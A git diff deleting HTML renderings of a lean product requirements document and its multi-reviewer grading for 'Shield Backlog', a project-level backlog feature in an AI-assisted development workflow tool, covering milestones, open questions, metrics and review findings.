-<h3 id="non-goals">Non-goals</h3>
-<ul>
-<li><strong>Automatic end-of-task surfacing machinery</strong> (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.</li>
-<li><strong>Per-feature backlogs.</strong> v1 is a single global backlog.</li>
-<li><strong>A status/workflow engine.</strong> The lifecycle is minimal: an entry exists in the backlog until its work lands in a <code>plan.json</code>, at which point it is removed. No multi-state machine.</li>
-<li><strong>Syncing the backlog to the PM tool</strong> (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing <code>/pm-sync</code> on the resulting plan.</li>
-<li><strong>Replacing the PM tool's own backlog.</strong> This is Shield-local triage, not a project-management backlog of record.</li>
-</ul>
-<!-- [P2 from: PM] 2c — Add a scope-creep guard: name the most probable creep ask (e.g. a rejected/dropped state, or ClickUp sync) and state that @ashwinimanoj gates any v1 expansion. -->
-<h2 id="7-success-metrics">7. Success metrics</h2>
-<table>
-<thead>
-<tr>
-<th>Metric</th>
-<th>Type</th>
-<th>Target</th>
-<th>Counter</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot</td>
-<td>Outcome</td>
-<td>Majority of entries reach a terminal state (promoted/landed in a plan, or explicitly dropped) rather than rotting</td>
-<td>Entries pile up un-triaged → backlog becomes a graveyard</td>
-</tr>
-<tr>
-<td>Entries carrying a feature + epic association at promotion time</td>
-<td>Quality</td>
-<td>100% — promotion cannot complete without a feature and epic</td>
-<td>Forcing association makes capture so heavy nobody captures</td>
-</tr>
-<tr>
-<td>Agent feature/epic-suggestion acceptance</td>
-<td>Quality</td>
-<td>Suggested feature/epic accepted often enough to save manual lookup</td>
-<td>Bad suggestions that users routinely override</td>
-</tr>
-<tr>
-<td>Capture friction</td>
-<td>Adoption</td>
-<td>Capturing an entry mid-task takes one step and does not interrupt the current task</td>
-<td>Capture is so quick the backlog fills with low-signal noise</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: PM/DX] 3a — Three of four targets are vague ("Majority", "often enough", "one step"). Attach numbers + a time horizon, e.g. ">=70% of entries reach a terminal state within 30 days", ">=60% suggestion-acceptance". -->
-<!-- [P1 from: PM] 3d — Name a tracking owner/method: there is no dashboard or cadence, and reconciliation deletes entries (no source of truth for "terminal state"). Measure via periodic /backlog audit or git history of backlog.json. -->
-<h2 id="8-milestones">8. Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Exit criteria</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>A global <code>backlog.json</code> exists; entries can be added (user + agent) with order, source, and feature + epic association; <code>/backlog</code> shows the ordered list with per-entry pipeline status from <code>manifest.json</code></td>
-<td><code>backlog.json</code> schema defined; an entry can be captured from a skill or by the user; <code>/backlog</code> renders the ordered backlog with feature + epic and a research/prd/plan status read from <code>manifest.json</code></td>
-<td>—</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic</td>
-<td>Capture prompts for a feature + epic; agent scans <code>manifest.json</code> features and known epics and proposes a match; user can accept, pick another, or create-new</td>
-<td>M1</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>The user picks an entry and starts the Shield step they choose (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>); once the entry's epic's work appears in the feature's <code>plan.json</code>, it is removed from the backlog</td>
-<td>Reconciliation uses <code>manifest.json</code> (find feature, has-plan?) + <code>plan.json</code> (epic present?) — no ids stamped; a <code>prd</code>-only feature is <strong>not</strong> removed; <code>/backlog</code> reconciles on view; the user-chosen step is never overridden</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: DX] M3 exit criteria asserts "/backlog reconciles on view" as settled, but §9 still lists the reconciliation trigger as OPEN. Resolve §9 or soften M3 — a developer can't implement against an unsettled trigger. -->
-<!-- [P1 from: Agile-coach] 4a/4e — Exit criteria are happy-path only and a few are thresholdless ("agent suggests a matching feature/epic"). Tighten to verifiable conditions and add ≥1 error path per flow (missing plan.json, abandoned capture, concurrent write). -->
-<h2 id="9-open-questions">9. Open questions</h2>
-<!-- [P0 from: PM] 12a (Risks & assumptions) — There is NO risks section anywhere. Add a lean risks table (risk + mitigation + named owner) and an assumptions list (validated vs unvalidated). The key unvalidated assumption: "agents reliably surface follow-ups conversationally" — the entire no-hooks non-goal rests on it. Mitigations mostly exist already (reconciliation-on-view → graveyard; atomic write → corruption). This is the single P0 blocking /plan. -->
-<ul>
-<li><strong>Feature/epic discovery scope.</strong> <code>manifest.json</code> lists features (the reconciliation key). Epics still live inside per-feature <code>plan.json</code> files, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged <code>plan.json</code> files; revisit if a project-level epic index is ever needed.)</li>
-<li><strong>Reconciliation matching (resolved):</strong> no ids are stamped. An entry references a <strong>feature</strong> (matched against <code>manifest.json</code>) and an <strong>epic</strong> (confirmed in that feature's <code>plan.json</code>). The entry is removed only once its epic's work appears in the plan — a <code>prd</code>-only feature is <strong>not</strong> removed. Open: does reconciliation run on <code>/backlog</code> view, at the end of <code>/plan</code>, or both? (Leaning: on <code>/backlog</code> view, since the user drives promotion.)</li>
-</ul>
-<!-- [P1 from: DX] This "(resolved)" still leaves the proposed-new-epic → real-epic match key undefined (string match vs user-confirmed). And the trailing "Open: ..." trigger contradicts M3 (line above). Settle both. -->
-<ul>
-<li><strong>Ordering scheme.</strong> Single global rank (explicit integer order, like <code>orderindex</code>), priority buckets (P0/P1/P2), or both? (Leaning: explicit order field for v1.)</li>
-<li><strong>Entry granularity.</strong> The ask says &quot;epics/stories/tasks.&quot; Do we model a <code>kind</code> field, or treat every entry uniformly as &quot;future work that becomes ≥1 story on promotion&quot;? (Leaning: a <code>kind</code> hint, but promotion always yields stories.)</li>
-<li><strong>Dropped/rejected entries.</strong> Do we need an explicit terminal state for &quot;decided against,&quot; or is deleting the entry enough? (Deferred — see Out of scope.)</li>
-</ul>
-<!-- [P2 from: PM] 12c — Promote the resolved/settled open questions into a short decision log (alternative considered + why set aside) so the dissenting view survives. -->
-<h2 id="10-out-of-scope--non-goals">10. Out of scope / Non-goals</h2>
-<ul>
-<li>Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>A <code>rejected</code>/<code>dropped</code> lifecycle state and the audit trail for declined ideas.</li>
-<li><code>/pm-sync</code> of backlog entries to the PM tool before promotion.</li>
-<li>Cross-project / multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).</li>
-</ul>
-<!-- [P2 from: PM] 2b — Several items here are bare. Add a one-line why-deferred to each (e.g. "Per-feature backlogs — prove the single global store in v1 first; split only if features grow large"). -->
-<hr />
-<blockquote>
-<p><strong>This is a lean PRD.</strong> It intentionally omits the following standard sections:</p>
-<ul>
-<li>Section 8 — User stories &amp; scenarios</li>
-<li>Section 9 — Functional requirements</li>
-<li>Section 10 — Non-functional requirements</li>
-<li>Section 11 — RBAC &amp; permissions matrix</li>
-<li>Section 12 — Dependencies</li>
-<li>Section 13 — Risks &amp; mitigations</li>
-<li>Section 14 — Assumptions</li>
-<li>Section 15 — Rollout plan (full — lean has its own §8 Milestones)</li>
-<li>Section 16 — Cost &amp; resource impact</li>
-<li>Section 17 — GTM &amp; customer-comms</li>
-<li>Section 18 — Support / CX impact</li>
-</ul>
-<p>If scope grows or stakeholders need more detail, run <code>/prd</code> again — Shield
-will offer to add specific sections or upgrade to <code>standard</code>.</p>
-</blockquote>
-<!-- [Reviewer note] The lean footer omits §13 Risks and §14 Assumptions, but the PRD-Review rubric grades dim 12 (Risks & assumptions) even for lean PRDs — hence the P0 above. A lean risks/assumptions treatment (a few lines) satisfies it without upgrading to standard. -->
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
deleted file mode 100644
index fdaf2b5a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
+++ /dev/null
@@ -1,241 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict-needs-work-composite-27-blocked-by-1-p0">Verdict: Needs Work (composite 2.7, blocked by 1 P0)</a>
-<ul>
-<li><a href="#per-dimension-grades">Per-dimension grades</a></li>
-</ul>
-</li>
-<li><a href="#p0--must-fix-before-plan-1">P0 — must fix before /plan (1)</a>
-</li>
-<li><a href="#p1--should-fix-for-quality-8">P1 — should fix for quality (8)</a>
-</li>
-<li><a href="#p2--nice-to-have-4">P2 — nice to have (4)</a>
-</li>
-<li><a href="#dx-anti-patterns-cross-cutting">DX anti-patterns (cross-cutting)</a>
-</li>
-<li><a href="#tech-lead-nfr-notes-informational-lean-exempt--but-real">Tech-lead NFR notes (informational, lean-exempt — but real)</a>
-</li>
-<li><a href="#recommended-next-steps">Recommended next steps</a>
-</li>
-</ul>
-</nav>
-<h1 id="prd-review--shield-backlog">PRD Review — Shield Backlog</h1>
-<p><strong>Source:</strong> <code>docs/shield/backlog-20260527/prd.md</code> (snapshot: <code>source-prd.md</code>)
-<strong>PRD type:</strong> Lean (confirmed) · <strong>Date:</strong> 2026-05-27 · <strong>Reviewers:</strong> 13 dispatches (9 PM dims + agile-coach + tech-lead + dx-engineer + finops-analyst)</p>
-<h2 id="verdict-needs-work-composite-27-blocked-by-1-p0">Verdict: <strong>Needs Work</strong> (composite 2.7, blocked by 1 P0)</h2>
-<p>Strong, well-scoped lean PRD with an unusually clean conceptual model (manifest = reconciliation key, epic = removal gate, no ids). It's held back by one Critical gap (no risks/assumptions treatment) and a cluster of consistency issues — several introduced by the recent rapid edits (the reconciliation trigger and &quot;automatically&quot; wording).</p>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Weight</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>product-manager (dims 1,2,3,7,8,11,12)</td>
-<td>1.0</td>
-<td><strong>C (2.17)</strong></td>
-<td>dim 1 &amp; 12 drag it down</td>
-</tr>
-<tr>
-<td>agile-coach (dim 4)</td>
-<td>1.0</td>
-<td><strong>B (3.0)</strong></td>
-<td>happy-path-only coverage</td>
-</tr>
-<tr>
-<td>tech-lead (dims 5,6)</td>
-<td>1.0</td>
-<td><strong>Informational</strong></td>
-<td>lean-exempt (real NFR notes below)</td>
-</tr>
-<tr>
-<td>dx-engineer (anti-patterns)</td>
-<td>0.7</td>
-<td><strong>B (3.0)</strong></td>
-<td>found edit-induced contradictions</td>
-</tr>
-<tr>
-<td>finops-analyst (dim 13)</td>
-<td>0.7</td>
-<td><strong>N/A</strong></td>
-<td>internal tool, no cost surface</td>
-</tr>
-<tr>
-<td><strong>Composite</strong></td>
-<td></td>
-<td><strong>2.69</strong></td>
-<td>≥2.5 but P0-gated → Needs Work</td>
-</tr>
-</tbody>
-</table>
-<h3 id="per-dimension-grades">Per-dimension grades</h3>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-<th></th>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Problem clarity</td>
-<td><strong>D</strong></td>
-<td></td>
-<td>8</td>
-<td>Legal/privacy</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>2</td>
-<td>Scope boundaries</td>
-<td>B</td>
-<td></td>
-<td>9</td>
-<td>GTM</td>
-<td>informational</td>
-</tr>
-<tr>
-<td>3</td>
-<td>Measurable success</td>
-<td>C</td>
-<td></td>
-<td>10</td>
-<td>Support/CX</td>
-<td>informational</td>
-</tr>
-<tr>
-<td>4</td>
-<td>Scenario coverage &amp; AC</td>
-<td>B</td>
-<td></td>
-<td>11</td>
-<td>Why now</td>
-<td>C</td>
-</tr>
-<tr>
-<td>5</td>
-<td>NFR coverage</td>
-<td>informational</td>
-<td></td>
-<td>12</td>
-<td>Risks &amp; assumptions</td>
-<td><strong>D</strong></td>
-</tr>
-<tr>
-<td>6</td>
-<td>Rollout &amp; ops</td>
-<td>informational</td>
-<td></td>
-<td>13</td>
-<td>Cost</td>
-<td>informational</td>
-</tr>
-<tr>
-<td>7</td>
-<td>RACI &amp; approvals</td>
-<td>A</td>
-<td></td>
-<td></td>
-<td></td>
-<td></td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="p0--must-fix-before-plan-1">P0 — must fix before <code>/plan</code> (1)</h2>
-<p><strong>P0-1 · Dim 12a · Risks &amp; assumptions (Critical, F).</strong> No risks section: failure modes appear only as §7 counter-metrics, with no mitigations or named owners, and no validated/unvalidated assumptions framing.
-→ <em>Add a short lean risks table — each risk + mitigation + owner — and an assumptions list. The load-bearing unvalidated assumption is the whole no-hooks bet: &quot;agents reliably surface follow-ups conversationally.&quot; Mitigations mostly already exist (reconciliation-on-view → graveyard risk; atomic write → corruption).</em></p>
-<h2 id="p1--should-fix-for-quality-8">P1 — should fix for quality (8)</h2>
-<ul>
-<li><strong>P1-1 · Dim 1b (Important, F).</strong> Problem stated with zero baseline numbers. → Add one figure, e.g. &quot;~N follow-ups lost across the last M <code>/implement</code> runs.&quot;</li>
-<li><strong>P1-2 · Dim 1a (Critical, C).</strong> Personas are role categories, not a named persona. → Name P1 concretely (e.g. &quot;Ashwini, Shield maintainer running <code>/implement</code> daily&quot;).</li>
-<li><strong>P1-3 · Dim 3a (Critical, C).</strong> Three of four metrics use vague targets (&quot;Majority&quot;, &quot;often enough&quot;, &quot;one step&quot;). → Attach numbers + a time horizon (e.g. &quot;≥70% reach a terminal state within 30 days&quot;).</li>
-<li><strong>P1-4 · Dim 3d (Warning, F).</strong> No tracking owner/cadence for the metrics. → Name how it's measured (e.g. periodic <code>/backlog</code> audit, or git history of <code>backlog.json</code>).</li>
-<li><strong>P1-5 · Dim 11a/11b (Critical/Important, C).</strong> Why-now describes a standing gap, not a concrete trigger; cost-of-inaction unquantified. → Anchor to a real recent instance of lost follow-up work.</li>
-<li><strong>P1-6 · Dim 12b (Important, D).</strong> No validated-vs-unvalidated assumptions split. → See P0-1 fix.</li>
-<li><strong>P1-7 · Dim 4a (Critical, C) + 4b (Important, C).</strong> Flows are happy-path only; edge cases (missing <code>plan.json</code>, abandoned capture, concurrent writes to the single global <code>backlog.json</code>, two features sharing an epic id) unaddressed. → Add ≥1 error path per core flow; resolve the ordering-collision open question.</li>
-<li><strong>P1-8 · DX / matching rule (P1).</strong> With ids removed, the PRD never says <strong>how a proposed-new epic name is matched to the eventual real epic in <code>plan.json</code></strong> — this is the central removal-correctness decision and is left implicit. → Specify the match key (string match? user-confirmed at promotion?).</li>
-</ul>
-<h2 id="p2--nice-to-have-4">P2 — nice to have (4)</h2>
-<ul>
-<li><strong>Dim 2b (Critical, B).</strong> Several §10 out-of-scope items are bare; add a one-line why-deferred each.</li>
-<li><strong>Dim 2c (Warning, F).</strong> No scope-creep guard naming the likely creep ask + decision authority (@ashwinimanoj).</li>
-<li><strong>Dim 7c (Important, B).</strong> Sign-off N/A names no confirmer → &quot;N/A — internal tooling (confirmed by @ashwinimanoj)&quot;.</li>
-<li><strong>Dim 12c (Warning, B).</strong> Promote resolved §9 open questions into a short decision log.</li>
-</ul>
-<hr />
-<h2 id="dx-anti-patterns-cross-cutting">DX anti-patterns (cross-cutting)</h2>
-<p>Two of these were introduced by the recent edits — worth fixing before <code>/plan</code>:</p>
-<ol>
-<li><strong>(P1) M3 vs §9 contradiction.</strong> §8 M3 states &quot;<code>/backlog</code> reconciles on view&quot; as settled, but §9 still lists the reconciliation trigger as <strong>Open</strong> (&quot;on view / end of <code>/plan</code> / both&quot;). A developer can't implement M3 against an unsettled trigger. → Resolve §9 or soften M3.</li>
-<li><strong>(P2) &quot;removed automatically&quot; vs user-triggered.</strong> §6 says entries are &quot;removed <strong>automatically</strong>,&quot; but reconciliation runs on <code>/backlog</code> view (a user action) — and §6's own non-goal disclaims &quot;automatic surfacing machinery.&quot; → Replace &quot;automatically&quot; with &quot;on next <code>/backlog</code> view.&quot;</li>
-<li><strong>(P1) <code>kind</code> field undefined but assumed settled.</strong> §6 + M1 commit to &quot;epic/story/task granularity&quot; and M1 says &quot;schema defined,&quot; yet §9 leaves the backing <code>kind</code> field open. → Decide <code>kind</code> before M1.</li>
-<li><strong>(P1) Capture-from-skill interface undefined.</strong> M1 requires capture &quot;usable from any Shield skill&quot; but no command/helper/write-contract is specified. → Define the capture entrypoint.</li>
-<li><strong>(P1) Reconciliation match key</strong> — see P1-8.</li>
-<li><strong>(P1) Unfalsifiable metrics</strong> — see P1-3.</li>
-</ol>
-<p><strong>Clarity strengths (keep):</strong> problem-first ordering; the feature=key / epic=gate distinction is load-bearing and well-defined; non-goals are thorough with rationale; lean exemptions are explicit and correct.</p>
-<h2 id="tech-lead-nfr-notes-informational-lean-exempt--but-real">Tech-lead NFR notes (informational, lean-exempt — but real)</h2>
-<p>Not gating, but cheap to fold in now since the plan will need them:</p>
-<ul>
-<li><strong>Atomic write + concurrency</strong> for <code>backlog.json</code> (write-temp-then-rename; concurrent capture vs reconcile-rewrite is the primary failure case).</li>
-<li><strong>Schema versioning</strong> — add <code>schema_version</code> so the open §9 shape decisions (ordering, <code>kind</code>) can evolve via read-old/write-new.</li>
-<li><strong>Read-contract drift</strong> — reconciliation should no-op (never remove) if <code>manifest.json</code>/<code>plan.json</code> are missing or an older shape, not error.</li>
-<li><strong>Recovery posture</strong> — <code>backlog.json</code> is git-tracked, so a bad reconciliation is <code>git revert</code>-able; consider a dry-run/confirm before reconcile removals in v1.</li>
-</ul>
-<hr />
-<h2 id="recommended-next-steps">Recommended next steps</h2>
-<ol>
-<li>Fix <strong>P0-1</strong> (risks/assumptions) and the two edit-induced contradictions (#1, #2) — all small.</li>
-<li>Resolve the three M1-gating open questions (<code>kind</code>, ordering, reconciliation trigger) or mark them deferred-with-default.</li>
-<li>Specify the <strong>epic match key</strong> (P1-8) — it's the correctness heart of reconciliation.</li>
-<li>Re-run <code>/prd-review</code> or proceed to <code>/plan</code> once P0 is cleared.</li>
-</ol>
-<p><em>Files: <code>summary.md</code> (this), <code>enhanced-prd.md</code> (annotated), <code>review-comments.json</code>, <code>detailed/*.md</code> ×5.</em></p>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
deleted file mode 100644
index c1857896..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
+++ /dev/null
@@ -1,364 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield PRD Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield PRD Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/prd/2026-05-27/</code>)</div>
-<h1 id="shield-backlog">Shield Backlog</h1>
-<!--
-  PRD-Review enhanced copy — 2026-05-27 (run _2). Verdict: Ready (composite 3.1, 0 P0).
-  Source is unchanged; remaining items are listed here with line refs (table/mermaid splicing avoided).
-
-  P1 (§2, ~line 23): "the entry is removed only when this epic's work appears in plan.json" contradicts the
-      manual-remove trigger (§5/§6/§9) — change "only when" to "when", or add "(or removed manually)".
-  P1 (§5 / §8 M1, ~lines 47/97): capture "usable from any Shield skill" — the capture interface
-      (command/helper name + entry fields) is undefined; define at/before /plan.
-  P1 (§3 / §10, ~line 127): problem baseline unquantified (honestly logged as unvalidated) —
-      add one real figure from past /implement transcripts to harden why-now.
-
-  P2 (§5 / §9, ~lines 47/104): the "transient promotion reference" mechanism is prose-only — pin how
-      /plan and /implement receive and act on it in the /plan/TRD.
-  P2 (§6, ~line 74): state that eager-prune and the /backlog sweep are idempotent (remove-if-present).
-  P2 (§6/§11): add a scope-creep guard naming the likely ask + @ashwinimanoj as accept authority.
-  P2 (§1): sign-off N/A → "N/A — internal tooling, confirmed by @ashwinimanoj".
-
-  TRD inputs (tech-lead, informational/lean-exempt but carry forward): add backlog.json schema_version +
-      migration policy; reconciliation treats unknown manifest.json/plan.json shapes as doubt→entry-stays;
-      state a /backlog sweep perf budget; name a rollback-to-manual-only trigger.
--->
-<h2 id="1-header">1. Header</h2>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-<tr>
-<td>PRD type</td>
-<td>Lean</td>
-</tr>
-<tr>
-<td>Date created</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Last updated</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Linked design spec</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Linked research</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Decision-maker</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Sign-off contacts</td>
-<td><em>(n/a for internal tooling)</em></td>
-</tr>
-<tr>
-<td>Linked plans</td>
-<td><em>(auto-populated by /plan)</em></td>
-</tr>
-</tbody>
-</table>
-<h2 id="2-terminologies">2. Terminologies</h2>
-<table>
-<thead>
-<tr>
-<th>Term</th>
-<th>Definition</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog</td>
-<td>A project-level, ordered list of future work captured across the Shield workflow. Lives at <code>docs/shield/backlog.json</code>.</td>
-</tr>
-<tr>
-<td>Backlog entry</td>
-<td>One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a <code>kind</code> hint (<code>epic</code> | <code>story</code> | <code>task</code>), a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong> (either may be proposed-new until promotion).</td>
-</tr>
-<tr>
-<td>Feature association</td>
-<td>The feature an entry belongs to (a <code>docs/shield/&lt;feature&gt;/</code> folder). It is the <strong>reconciliation key</strong>: <code>manifest.json</code> is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.</td>
-</tr>
-<tr>
-<td>Epic association</td>
-<td>The epic an entry slots into when planned — an existing epic id (e.g. <code>EPIC-2</code>) or a proposed new epic. Acts as the <strong>gate</strong> at reconciliation: the entry is removed only when this epic's work appears in the feature's <code>plan.json</code>.</td>
-</tr>
-<tr>
-<td>Promotion</td>
-<td>Acting on a backlog entry by starting the appropriate Shield step for it — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. <strong>The user decides which step</strong>; the backlog does not auto-route.</td>
-</tr>
-<tr>
-<td>Reconciliation</td>
-<td>Keeping the backlog current: <code>manifest.json</code> locates the entry's feature and whether it has a <code>plan.json</code>; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's <code>plan.json</code> (<code>epics[].stories[]</code>). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by <strong>epic id</strong>, a proposed-new-epic entry matches by <strong>epic name</strong> (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A <code>prd</code>-only feature does <strong>not</strong> trigger removal. Removal fires at the end of the <code>/plan</code> or <code>/implement</code> run promoted from the entry, or on the <code>/backlog</code> view sweep.</td>
-</tr>
-<tr>
-<td>Agent-discovered entry</td>
-<td>A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).</td>
-</tr>
-</tbody>
-</table>
-<h2 id="3-problem--context">3. Problem &amp; context</h2>
-<p>Future work surfaces constantly while using Shield — during <code>/research</code>, while writing a PRD, mid-<code>/plan</code>, and especially during <code>/implement</code> (&quot;we should also handle X later&quot;, &quot;this whole area needs a rewrite&quot;). Today there is <strong>nowhere to park that work</strong>. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.</p>
-<p>Concretely:</p>
-<ul>
-<li>There is no project-level, ordered place to capture &quot;not now, but later&quot; items. <code>plan.json</code> only holds work already committed to a milestone; <code>manifest.json</code> is an artifact index. Neither captures un-triaged future work.</li>
-<li>Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.</li>
-<li>When future work <em>is</em> remembered, there's no consistent path from &quot;loose idea&quot; to &quot;stories in a plan.&quot; Each pickup re-derives the epic, the feature, and the scope from scratch.</li>
-</ul>
-<p>Why now: Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) is mature, but it only handles work that's <em>already</em> been decided on. The gap is the staging area <em>before</em> that pipeline — where future work waits, ordered, until the user promotes it in.</p>
-<h2 id="4-target-users--personas">4. Target users / personas</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Persona</th>
-<th>Goals</th>
-<th>Frictions today</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>Ashwini — Shield maintainer running <code>/research</code>/<code>/plan</code>/<code>/implement</code> daily</td>
-<td>Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next</td>
-<td>Future ideas get lost or derail the current task; no ordered &quot;later&quot; list at the project level</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>The agent (Claude) running a Shield task</td>
-<td>Record follow-up work it discovers mid-task so the human doesn't have to remember it</td>
-<td>Discovered work is mentioned once in chat then forgotten; no place to persist it</td>
-</tr>
-</tbody>
-</table>
-<h2 id="5-architecture--flows">5. Architecture &amp; flows</h2>
-<p>A single global store <code>docs/shield/backlog.json</code> (sibling to <code>manifest.json</code>), a <code>/backlog</code> command to view it, a capture path usable from any Shield skill or by the user, and a <strong>user-driven promotion</strong>: the user picks an entry and starts whichever Shield step fits — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. Each entry carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong>. <strong>Reconciliation</strong> reads <code>manifest.json</code> as the project-level index — to find each entry's feature, see whether it has a <code>plan.json</code>, and surface its pipeline status (research/prd/plan) in the <code>/backlog</code> view — then opens the flagged <code>plan.json</code> and removes any entry whose epic's work now appears there. A <code>prd</code>-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via <code>/plan</code> or <code>/implement</code> is pruned at the <strong>end of that run</strong> (the command carries the entry as a transient promotion reference); the <code>/backlog</code> view sweep is the lazy safety net for work that landed without an explicit reference; and a <strong>manual remove</strong> clears ideas decided against or anything not tied to a promotion run.</p>
-<pre class="mermaid">flowchart LR
-  cap[&quot;Capture&lt;br/&gt;(user or agent, anytime)&quot;] --&gt; bl[&quot;backlog.json&lt;br/&gt;(ordered, project-level)&quot;]
-  bl --&gt; view[&quot;/backlog&lt;br/&gt;(ordered list +&lt;br/&gt;per-entry pipeline status)&quot;]
-  man[&quot;manifest.json&lt;br/&gt;(feature index:&lt;br/&gt;research/prd/plan)&quot;] --&gt; view
-  bl --&gt; dec{&quot;User decides&lt;br/&gt;next step&quot;}
-  dec --&gt; research[&quot;/research&quot;]
-  dec --&gt; prd[&quot;/prd&quot;]
-  dec --&gt; plan[&quot;/plan&quot;]
